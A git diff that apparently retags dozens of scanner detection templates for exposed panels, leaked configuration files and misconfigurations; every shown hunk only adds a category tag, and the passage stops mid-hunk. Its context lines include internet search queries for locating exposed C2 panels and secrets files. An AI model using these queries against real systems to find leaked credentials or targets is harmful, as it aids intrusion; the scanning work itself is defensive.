diff --git a/http/exposed-panels/arcgis/arcgis-rest-api.yaml b/http/exposed-panels/arcgis/arcgis-rest-api.yaml index 6e8b5ba865..9f0ff3df13 100644 --- a/http/exposed-panels/arcgis/arcgis-rest-api.yaml +++ b/http/exposed-panels/arcgis/arcgis-rest-api.yaml @@ -9,7 +9,7 @@ info: - https://enterprise.arcgis.com/en/ classification: cwe-id: CWE-200 - tags: api,arcgis,cms + tags: api,arcgis,cms,panel metadata: max-request: 1 diff --git a/http/exposed-panels/avtech-dvr-exposure.yaml b/http/exposed-panels/avtech-dvr-exposure.yaml index 10819c057d..7518cbd5aa 100644 --- a/http/exposed-panels/avtech-dvr-exposure.yaml +++ b/http/exposed-panels/avtech-dvr-exposure.yaml @@ -7,7 +7,7 @@ info: description: AVTECH AVC798HA DVR is susceptible to information exposure. CGI scripts in the /cgi-bin/nobody directory can be accessed without authentication. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - http://www.avtech.com.tw/ - tags: dvr,exposure,avtech + tags: dvr,exposure,avtech,panel metadata: max-request: 1 diff --git a/http/exposed-panels/aws-ec2-autoscale.yaml b/http/exposed-panels/aws-ec2-autoscale.yaml index d1b61492b9..bfe0d7b918 100644 --- a/http/exposed-panels/aws-ec2-autoscale.yaml +++ b/http/exposed-panels/aws-ec2-autoscale.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: html:"AWS EC2 Auto Scaling Lab" - tags: exposure,ec2,aws,amazon + tags: exposure,ec2,aws,amazon,panel http: - method: GET diff --git a/http/exposed-panels/c2/brute-ratel-c4.yaml b/http/exposed-panels/c2/brute-ratel-c4.yaml index 806a0b6eea..abd400f2d8 100644 --- a/http/exposed-panels/c2/brute-ratel-c4.yaml +++ b/http/exposed-panels/c2/brute-ratel-c4.yaml @@ -12,7 +12,7 @@ info: max-request: 1 shodan-query: http.html_hash:-1957161625 verified: "true" - tags: c2,bruteratel,c4 + tags: c2,bruteratel,c4,panel http: - method: GET diff --git a/http/exposed-panels/c2/covenant-c2.yaml b/http/exposed-panels/c2/covenant-c2.yaml index b2616a0059..557d721e0d 100644 --- a/http/exposed-panels/c2/covenant-c2.yaml +++ b/http/exposed-panels/c2/covenant-c2.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: ssl:”Covenant” http.component:”Blazor” - tags: c2,ir,osint,covenant + tags: c2,ir,osint,covenant,panel http: - method: GET diff --git a/http/exposed-panels/c2/deimos-c2.yaml b/http/exposed-panels/c2/deimos-c2.yaml index 19bc1d13c1..192448d3d3 100644 --- a/http/exposed-panels/c2/deimos-c2.yaml +++ b/http/exposed-panels/c2/deimos-c2.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: http.html_hash:-14029177 - tags: c2,ir,osint,deimosc2 + tags: c2,ir,osint,deimosc2,panel http: - method: GET diff --git a/http/exposed-panels/c2/empire-c2.yaml b/http/exposed-panels/c2/empire-c2.yaml index a09c0b8819..1df221c3bf 100644 --- a/http/exposed-panels/c2/empire-c2.yaml +++ b/http/exposed-panels/c2/empire-c2.yaml @@ -13,7 +13,7 @@ info: censys-query: bc517bf173440dad15b99a051389fadc366d5df2 || dcb32e6256459d3660fdc90e4c79e95a921841cc max-request: 1 verified: "true" - tags: c2,ir,osint,empire + tags: c2,ir,osint,empire,panel http: - method: GET diff --git a/http/exposed-panels/c2/evilginx.yaml b/http/exposed-panels/c2/evilginx.yaml index fd4dfcdb08..abe70080a3 100644 --- a/http/exposed-panels/c2/evilginx.yaml +++ b/http/exposed-panels/c2/evilginx.yaml @@ -12,7 +12,7 @@ info: censys-query: b18d778b4e4b6bf1fd5b2d790c941270145a6a6d max-request: 1 verified: "true" - tags: tech,evilginx,c2,phishing + tags: tech,evilginx,c2,phishing,panel http: - method: GET diff --git a/http/exposed-panels/c2/mythic-c2.yaml b/http/exposed-panels/c2/mythic-c2.yaml index 85951cd9ec..c413d05414 100644 --- a/http/exposed-panels/c2/mythic-c2.yaml +++ b/http/exposed-panels/c2/mythic-c2.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: 'ssl:Mythic port:7443' - tags: c2,ir,osint,mythic + tags: c2,ir,osint,mythic,panel http: - method: GET diff --git a/http/exposed-panels/c2/nh-c2.yaml b/http/exposed-panels/c2/nh-c2.yaml index 7bdc7feb49..d1d835ec5e 100644 --- a/http/exposed-panels/c2/nh-c2.yaml +++ b/http/exposed-panels/c2/nh-c2.yaml @@ -10,7 +10,7 @@ info: censys-query: 10baf5fcdde4563d3e145a1f553ae433fb1c3572 max-request: 1 verified: "true" - tags: tech,nh,c2 + tags: tech,nh,c2,panel http: - method: GET diff --git a/http/exposed-panels/c2/viper-c2.yaml b/http/exposed-panels/c2/viper-c2.yaml index d2132dc2dc..e83c230a8b 100644 --- a/http/exposed-panels/c2/viper-c2.yaml +++ b/http/exposed-panels/c2/viper-c2.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: http.html_hash:1015055567 verified: "true" - tags: tech,viper,c2,malware,ir + tags: tech,viper,c2,malware,ir,panel http: - method: GET diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index e7c86eac51..e2495f4876 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: tech,cacti,login + tags: tech,cacti,login,panel metadata: max-request: 2 diff --git a/http/exposed-panels/checkmk/checkmk-login.yaml b/http/exposed-panels/checkmk/checkmk-login.yaml index 90240aa3b9..13b3b6e79d 100644 --- a/http/exposed-panels/checkmk/checkmk-login.yaml +++ b/http/exposed-panels/checkmk/checkmk-login.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: login,tech,synology,rackstation + tags: login,tech,synology,rackstation,panel metadata: max-request: 1 diff --git a/http/exposed-panels/crontab-ui.yaml b/http/exposed-panels/crontab-ui.yaml index 00f1282921..2c015deb13 100644 --- a/http/exposed-panels/crontab-ui.yaml +++ b/http/exposed-panels/crontab-ui.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: html:"Crontab UI" - tags: exposure,crontab,ui + tags: exposure,crontab,ui,panel http: - method: GET diff --git a/http/exposed-panels/edgeos-login.yaml b/http/exposed-panels/edgeos-login.yaml index b37c9b60dc..654d26597f 100644 --- a/http/exposed-panels/edgeos-login.yaml +++ b/http/exposed-panels/edgeos-login.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: login,tech,edgeos,edgemax + tags: login,tech,edgeos,edgemax,panel metadata: max-request: 1 diff --git a/http/exposed-panels/eos-http-browser.yaml b/http/exposed-panels/eos-http-browser.yaml index 9551f22680..ab4aa93475 100644 --- a/http/exposed-panels/eos-http-browser.yaml +++ b/http/exposed-panels/eos-http-browser.yaml @@ -10,7 +10,7 @@ info: max-request: 2 verified: true shodan-query: title:"EOS HTTP Browser" - tags: exposure,eos,httpbrowser + tags: exposure,eos,httpbrowser,panel http: - method: GET diff --git a/http/exposed-panels/gnu-mailman.yaml b/http/exposed-panels/gnu-mailman.yaml index 4e8ea7eb24..ade4f1a629 100644 --- a/http/exposed-panels/gnu-mailman.yaml +++ b/http/exposed-panels/gnu-mailman.yaml @@ -14,7 +14,7 @@ info: max-request: 2 verified: true shodan-query: title:"Mailing Lists" - tags: exposure,mailman + tags: exposure,mailman,panel http: - method: GET diff --git a/http/exposed-panels/hashicorp-consul-agent.yaml b/http/exposed-panels/hashicorp-consul-agent.yaml index ace7237627..227da1ea1a 100644 --- a/http/exposed-panels/hashicorp-consul-agent.yaml +++ b/http/exposed-panels/hashicorp-consul-agent.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: tech,consul,api + tags: tech,consul,api,panel metadata: max-request: 1 diff --git a/http/exposed-panels/konga-panel.yaml b/http/exposed-panels/konga-panel.yaml index 5119178e42..8a15823e10 100644 --- a/http/exposed-panels/konga-panel.yaml +++ b/http/exposed-panels/konga-panel.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: tech,konga,oss + tags: tech,konga,oss,panel metadata: max-request: 1 diff --git a/http/exposed-panels/kubernetes-enterprise-manager.yaml b/http/exposed-panels/kubernetes-enterprise-manager.yaml index e5f423d2de..147db9196f 100644 --- a/http/exposed-panels/kubernetes-enterprise-manager.yaml +++ b/http/exposed-panels/kubernetes-enterprise-manager.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 fofa-query: app="Kubernetes-Enterprise-Manager" - tags: tech,kubernetes + tags: tech,kubernetes,panel http: - method: GET diff --git a/http/exposed-panels/kubernetes-mirantis.yaml b/http/exposed-panels/kubernetes-mirantis.yaml index bb4037ac21..7c2753d13c 100644 --- a/http/exposed-panels/kubernetes-mirantis.yaml +++ b/http/exposed-panels/kubernetes-mirantis.yaml @@ -14,7 +14,7 @@ info: verified: true shodan-query: http.html:"Mirantis Kubernetes Engine" fofa-query: app="Mirantis-Kubernetes-Engine" - tags: tech,kubernetes,devops,kube,k8s + tags: tech,kubernetes,devops,kube,k8s,panel http: - method: GET diff --git a/http/exposed-panels/kubeview-dashboard.yaml b/http/exposed-panels/kubeview-dashboard.yaml index 2fb91135f0..8b840e2a24 100644 --- a/http/exposed-panels/kubeview-dashboard.yaml +++ b/http/exposed-panels/kubeview-dashboard.yaml @@ -14,7 +14,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-379154636 - tags: exposure,k8s,kubernetes,kubeview,dashboard + tags: exposure,k8s,kubernetes,kubeview,dashboard,panel http: - method: GET diff --git a/http/exposed-panels/magento-downloader-panel.yaml b/http/exposed-panels/magento-downloader-panel.yaml index d184747246..c464dedeb2 100644 --- a/http/exposed-panels/magento-downloader-panel.yaml +++ b/http/exposed-panels/magento-downloader-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.component:"Magento" - tags: magento,exposure + tags: magento,exposure,panel http: - method: GET diff --git a/http/exposed-panels/mautic-crm-panel.yaml b/http/exposed-panels/mautic-crm-panel.yaml index dc2215d232..7d306990b6 100644 --- a/http/exposed-panels/mautic-crm-panel.yaml +++ b/http/exposed-panels/mautic-crm-panel.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: tech,mautic,crm + tags: tech,mautic,crm,panel metadata: max-request: 1 diff --git a/http/exposed-panels/neo4j-browser.yaml b/http/exposed-panels/neo4j-browser.yaml index bb1ef67c3a..043f021cbc 100644 --- a/http/exposed-panels/neo4j-browser.yaml +++ b/http/exposed-panels/neo4j-browser.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Neo4j Browser" - tags: neo4j,exposure,unauth + tags: neo4j,exposure,unauth,panel http: - method: GET diff --git a/http/exposed-panels/openwrt-login.yaml b/http/exposed-panels/openwrt-login.yaml index 3243613ac5..d5f773d5b5 100644 --- a/http/exposed-panels/openwrt-login.yaml +++ b/http/exposed-panels/openwrt-login.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 2 shodan-query: http.title:"OpenWrt - LuCI" - tags: openwrt,router + tags: openwrt,router,panel http: - method: GET diff --git a/http/exposed-panels/pdi-device-page.yaml b/http/exposed-panels/pdi-device-page.yaml index a6b8b77dfa..8da85b02a7 100644 --- a/http/exposed-panels/pdi-device-page.yaml +++ b/http/exposed-panels/pdi-device-page.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: html:"PDI Intellifuel" - tags: exposure,pdi,intellifuel + tags: exposure,pdi,intellifuel,panel http: - method: GET diff --git a/http/exposed-panels/pulse-secure-version.yaml b/http/exposed-panels/pulse-secure-version.yaml index 0eba26a766..d3594a6e90 100644 --- a/http/exposed-panels/pulse-secure-version.yaml +++ b/http/exposed-panels/pulse-secure-version.yaml @@ -4,7 +4,7 @@ info: name: Pulse Secure Version author: dadevel severity: info - tags: pulse + tags: pulse,panel metadata: max-request: 2 diff --git a/http/exposed-panels/roxy-fileman.yaml b/http/exposed-panels/roxy-fileman.yaml index b76716cc35..b8951767aa 100644 --- a/http/exposed-panels/roxy-fileman.yaml +++ b/http/exposed-panels/roxy-fileman.yaml @@ -13,7 +13,7 @@ info: max-request: 4 verified: true google-query: intitle:"Roxy file manager" - tags: tech,fileupload,roxy,fileman + tags: tech,fileupload,roxy,fileman,panel http: - method: GET diff --git a/http/exposed-panels/synology-rackstation-login.yaml b/http/exposed-panels/synology-rackstation-login.yaml index dc96b479d9..0c94022c1c 100644 --- a/http/exposed-panels/synology-rackstation-login.yaml +++ b/http/exposed-panels/synology-rackstation-login.yaml @@ -4,7 +4,7 @@ info: name: Synology RackStation Login Detect author: princechaddha severity: info - tags: login,tech,synology,rackstation + tags: login,tech,synology,rackstation,panel metadata: max-request: 1 diff --git a/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml b/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml index a00fc81b57..27e2449115 100644 --- a/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml +++ b/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: title:"Apache Tomcat" - tags: version,tomcat,docs + tags: version,tomcat,docs,panel http: - method: GET diff --git a/http/exposed-panels/tup-openframe.yaml b/http/exposed-panels/tup-openframe.yaml index 3e091bc7db..fa6bd377d2 100644 --- a/http/exposed-panels/tup-openframe.yaml +++ b/http/exposed-panels/tup-openframe.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:824580113 - tags: exposure,login,tup,openframe + tags: exposure,login,tup,openframe,panel http: - method: GET diff --git a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml index 2c0ecdfaa9..b4cf52424d 100644 --- a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"VMG1312-B10D" - tags: tech,zyxel,modem,router + tags: tech,zyxel,modem,router,panel http: - method: GET diff --git a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml index 3df5adfb2a..96b9b99c8e 100644 --- a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"VSG1432-B101" - tags: tech,zyxel,modem,router + tags: tech,zyxel,modem,router,panel http: - method: GET diff --git a/http/exposures/apis/strapi-page.yaml b/http/exposures/apis/strapi-page.yaml index a52f859721..5692d22054 100644 --- a/http/exposures/apis/strapi-page.yaml +++ b/http/exposures/apis/strapi-page.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Welcome to your Strapi app" - tags: api,strapi + tags: api,strapi,exposure http: - method: GET diff --git a/http/exposures/configs/azure-domain-tenant.yaml b/http/exposures/configs/azure-domain-tenant.yaml index 1abc887652..55c92705bb 100644 --- a/http/exposures/configs/azure-domain-tenant.yaml +++ b/http/exposures/configs/azure-domain-tenant.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: azure,microsoft,cloud + tags: azure,microsoft,cloud,exposure metadata: max-request: 1 diff --git a/http/exposures/configs/esmtprc-config.yaml b/http/exposures/configs/esmtprc-config.yaml index 2d5001ac5e..301446b0da 100644 --- a/http/exposures/configs/esmtprc-config.yaml +++ b/http/exposures/configs/esmtprc-config.yaml @@ -7,7 +7,7 @@ info: description: eSMTP configuration was discovered. reference: - https://linux.die.net/man/5/esmtprc - tags: esmtp,config + tags: esmtp,config,exposure metadata: max-request: 1 diff --git a/http/exposures/configs/jkstatus-manager.yaml b/http/exposures/configs/jkstatus-manager.yaml index 10150a6bc7..9a76c43284 100644 --- a/http/exposures/configs/jkstatus-manager.yaml +++ b/http/exposures/configs/jkstatus-manager.yaml @@ -10,7 +10,7 @@ info: max-request: 8 verified: true shodan-query: html:"JK Status Manager" - tags: config,jk,status + tags: config,jk,status,exposure http: - method: GET diff --git a/http/exposures/configs/keycloak-openid-config.yaml b/http/exposures/configs/keycloak-openid-config.yaml index 37818ee5a4..acae33dac6 100644 --- a/http/exposures/configs/keycloak-openid-config.yaml +++ b/http/exposures/configs/keycloak-openid-config.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: keycloak,config + tags: keycloak,config,exposure metadata: max-request: 2 diff --git a/http/exposures/configs/robomongo-credential.yaml b/http/exposures/configs/robomongo-credential.yaml index 4a3968f147..b01503f4c3 100644 --- a/http/exposures/configs/robomongo-credential.yaml +++ b/http/exposures/configs/robomongo-credential.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 description: A MongoDB credentials file used by RoboMongo was detected. reference: https://robomongo.org/ - tags: mongodb,robomongo,disclosure,config + tags: mongodb,robomongo,disclosure,config,exposure metadata: max-request: 2 diff --git a/http/exposures/configs/wpconfig-aws-keys.yaml b/http/exposures/configs/wpconfig-aws-keys.yaml index f1f0838200..ca42c3dd2d 100644 --- a/http/exposures/configs/wpconfig-aws-keys.yaml +++ b/http/exposures/configs/wpconfig-aws-keys.yaml @@ -4,7 +4,7 @@ info: name: AWS S3 keys Leak author: r12w4n severity: high - tags: aws,s3,wordpress,disclosure + tags: aws,s3,wordpress,disclosure,exposure metadata: max-request: 2 diff --git a/http/exposures/files/gradle-libs.yaml b/http/exposures/files/gradle-libs.yaml index e044dfe90c..81e23bad6c 100644 --- a/http/exposures/files/gradle-libs.yaml +++ b/http/exposures/files/gradle-libs.yaml @@ -8,7 +8,7 @@ info: max-request: 2 verified: true github-query: filename:libs.versions.toml - tags: file,gradle + tags: file,gradle,exposure http: - method: GET diff --git a/http/exposures/files/jetbrains-webservers.yaml b/http/exposures/files/jetbrains-webservers.yaml index 4edb93e89d..1e2f93e0c0 100644 --- a/http/exposures/files/jetbrains-webservers.yaml +++ b/http/exposures/files/jetbrains-webservers.yaml @@ -16,7 +16,7 @@ info: max-request: 3 verified: true google-query: intitle:"index of" "WebServers.xml" - tags: jetbrains,config,edb,files + tags: jetbrains,config,edb,files,exposure http: - method: GET diff --git a/http/exposures/files/redmine-settings.yaml b/http/exposures/files/redmine-settings.yaml index 3bc35b0a4d..de32c35036 100644 --- a/http/exposures/files/redmine-settings.yaml +++ b/http/exposures/files/redmine-settings.yaml @@ -9,7 +9,7 @@ info: max-request: 3 verified: true google-query: intitle:"index of" "settings.yml" - tags: misconfig,redmine,devops,files + tags: misconfig,redmine,devops,files,exposure http: - method: GET diff --git a/http/exposures/files/secrets-file.yaml b/http/exposures/files/secrets-file.yaml index ec995f26e4..05038369d7 100644 --- a/http/exposures/files/secrets-file.yaml +++ b/http/exposures/files/secrets-file.yaml @@ -9,7 +9,7 @@ info: max-request: 4 verified: true google-query: intitle:"index of" "secrets.yml" - tags: misconfig,cloud,devops,files + tags: cloud,devops,files,exposure,misconfig http: - method: GET diff --git a/http/exposures/files/sensitive-storage-exposure.yaml b/http/exposures/files/sensitive-storage-exposure.yaml index e450a2f2ef..51b2a01870 100644 --- a/http/exposures/files/sensitive-storage-exposure.yaml +++ b/http/exposures/files/sensitive-storage-exposure.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: expose,listing,config,logs,storage,edb,files + tags: expose,listing,config,logs,storage,edb,files,exposure metadata: max-request: 6 diff --git a/http/exposures/logs/access-log.yaml b/http/exposures/logs/access-log.yaml index 613159894c..37b817a8c3 100644 --- a/http/exposures/logs/access-log.yaml +++ b/http/exposures/logs/access-log.yaml @@ -4,7 +4,7 @@ info: name: Publicly accessible access-log file author: sheikhrishad severity: low - tags: logs + tags: logs,exposure metadata: max-request: 4 diff --git a/http/exposures/logs/clockwork-php-page.yaml b/http/exposures/logs/clockwork-php-page.yaml index 549594aa52..5f7ce80388 100644 --- a/http/exposures/logs/clockwork-php-page.yaml +++ b/http/exposures/logs/clockwork-php-page.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://twitter.com/damian_89_/status/1250721398747791360 - tags: tech,clockwork + tags: tech,clockwork,exposure metadata: max-request: 1 diff --git a/http/exposures/logs/laravel-telescope.yaml b/http/exposures/logs/laravel-telescope.yaml index a19cf842f2..28e334a284 100644 --- a/http/exposures/logs/laravel-telescope.yaml +++ b/http/exposures/logs/laravel-telescope.yaml @@ -8,7 +8,7 @@ info: and more. reference: - https://laravel.com/docs/8.x/telescope - tags: laravel,disclosure,logs + tags: laravel,disclosure,logs,exposure metadata: max-request: 1 diff --git a/http/iot/routeros-login.yaml b/http/iot/routeros-login.yaml index d2b8a70167..4c46abae33 100644 --- a/http/iot/routeros-login.yaml +++ b/http/iot/routeros-login.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"RouterOS router configuration page" - tags: panel,router,routeros + tags: panel,router,routeros,iot http: - method: GET diff --git a/http/miscellaneous/aws-ecs-container-agent-tasks.yaml b/http/miscellaneous/aws-ecs-container-agent-tasks.yaml index 9c4e174b67..11b42d9802 100644 --- a/http/miscellaneous/aws-ecs-container-agent-tasks.yaml +++ b/http/miscellaneous/aws-ecs-container-agent-tasks.yaml @@ -7,7 +7,7 @@ info: description: Aws container metadata content reference: - https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect - tags: aws,docker,ec2 + tags: aws,docker,ec2,misc metadata: max-request: 2 diff --git a/http/miscellaneous/exposed-file-upload-form.yaml b/http/miscellaneous/exposed-file-upload-form.yaml index 8804f348b3..97fecb4d56 100644 --- a/http/miscellaneous/exposed-file-upload-form.yaml +++ b/http/miscellaneous/exposed-file-upload-form.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"multipart/form-data" html:"file" - tags: exposure,upload,form + tags: exposure,upload,form,misc http: - method: GET diff --git a/http/miscellaneous/microsoft-azure-error.yaml b/http/miscellaneous/microsoft-azure-error.yaml index bfe23a8709..d8cae54316 100644 --- a/http/miscellaneous/microsoft-azure-error.yaml +++ b/http/miscellaneous/microsoft-azure-error.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: title:"Microsoft Azure Web App - Error 404" - tags: error,azure,microsoft + tags: error,azure,microsoft,misc http: - method: GET diff --git a/http/miscellaneous/netflix-conductor-version.yaml b/http/miscellaneous/netflix-conductor-version.yaml index 4e2cca5e58..e040156aea 100644 --- a/http/miscellaneous/netflix-conductor-version.yaml +++ b/http/miscellaneous/netflix-conductor-version.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 2 shodan-query: http.title:"Conductor UI", http.title:"Workflow UI" - tags: tech,netflix,conductor,api + tags: tech,netflix,conductor,api,misc http: - method: GET diff --git a/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml b/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml index 6489b27f76..4526db494b 100644 --- a/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml +++ b/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - tags: adobe,disclosure,packetstorm + tags: adobe,disclosure,packetstorm,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/adobe/adobe-connect-version.yaml b/http/misconfiguration/adobe/adobe-connect-version.yaml index dcd77a12d1..8347d77db0 100644 --- a/http/misconfiguration/adobe/adobe-connect-version.yaml +++ b/http/misconfiguration/adobe/adobe-connect-version.yaml @@ -4,7 +4,7 @@ info: name: Adobe Connect Central Version author: dhiyaneshDk severity: info - tags: adobe + tags: adobe,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/aem/aem-bg-servlet.yaml b/http/misconfiguration/aem/aem-bg-servlet.yaml index 42dd291a9f..f93ce268f7 100644 --- a/http/misconfiguration/aem/aem-bg-servlet.yaml +++ b/http/misconfiguration/aem/aem-bg-servlet.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-cached-pages.yaml b/http/misconfiguration/aem/aem-cached-pages.yaml index 88cb41e16a..363422a14c 100644 --- a/http/misconfiguration/aem/aem-cached-pages.yaml +++ b/http/misconfiguration/aem/aem-cached-pages.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-childrenlist-xss.yaml b/http/misconfiguration/aem/aem-childrenlist-xss.yaml index e06a3957b5..717734becc 100644 --- a/http/misconfiguration/aem/aem-childrenlist-xss.yaml +++ b/http/misconfiguration/aem/aem-childrenlist-xss.yaml @@ -16,7 +16,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: xss,aem,adobe + tags: xss,aem,adobe,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-crx-bypass.yaml b/http/misconfiguration/aem/aem-crx-bypass.yaml index 52bb5c1a93..9181a6d9ee 100644 --- a/http/misconfiguration/aem/aem-crx-bypass.yaml +++ b/http/misconfiguration/aem/aem-crx-bypass.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 2 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe + tags: aem,adobe,misconfig http: - raw: diff --git a/http/misconfiguration/aem/aem-crx-namespace.yaml b/http/misconfiguration/aem/aem-crx-namespace.yaml index 81897ff482..c7b3fc1457 100644 --- a/http/misconfiguration/aem/aem-crx-namespace.yaml +++ b/http/misconfiguration/aem/aem-crx-namespace.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: exposure,aem,adobe + tags: exposure,aem,adobe,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-default-get-servlet.yaml b/http/misconfiguration/aem/aem-default-get-servlet.yaml index 290790ab25..ba3d2aa778 100644 --- a/http/misconfiguration/aem/aem-default-get-servlet.yaml +++ b/http/misconfiguration/aem/aem-default-get-servlet.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 64 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe + tags: aem,adobe,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-gql-servlet.yaml b/http/misconfiguration/aem/aem-gql-servlet.yaml index f2cd068225..0db1bcebcf 100644 --- a/http/misconfiguration/aem/aem-gql-servlet.yaml +++ b/http/misconfiguration/aem/aem-gql-servlet.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 29 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-groovyconsole.yaml b/http/misconfiguration/aem/aem-groovyconsole.yaml index b9b40ce79b..d817836dc9 100644 --- a/http/misconfiguration/aem/aem-groovyconsole.yaml +++ b/http/misconfiguration/aem/aem-groovyconsole.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 2 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe,hackerone + tags: aem,adobe,hackerone,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-hash-querybuilder.yaml b/http/misconfiguration/aem/aem-hash-querybuilder.yaml index 61dc859dbf..4abc85a9d4 100644 --- a/http/misconfiguration/aem/aem-hash-querybuilder.yaml +++ b/http/misconfiguration/aem/aem-hash-querybuilder.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - raw: diff --git a/http/misconfiguration/aem/aem-jcr-querybuilder.yaml b/http/misconfiguration/aem/aem-jcr-querybuilder.yaml index 91c8087b7c..4ea13fe428 100644 --- a/http/misconfiguration/aem/aem-jcr-querybuilder.yaml +++ b/http/misconfiguration/aem/aem-jcr-querybuilder.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - raw: diff --git a/http/misconfiguration/aem/aem-login-status.yaml b/http/misconfiguration/aem/aem-login-status.yaml index 8393ee2e20..5af880a1e1 100644 --- a/http/misconfiguration/aem/aem-login-status.yaml +++ 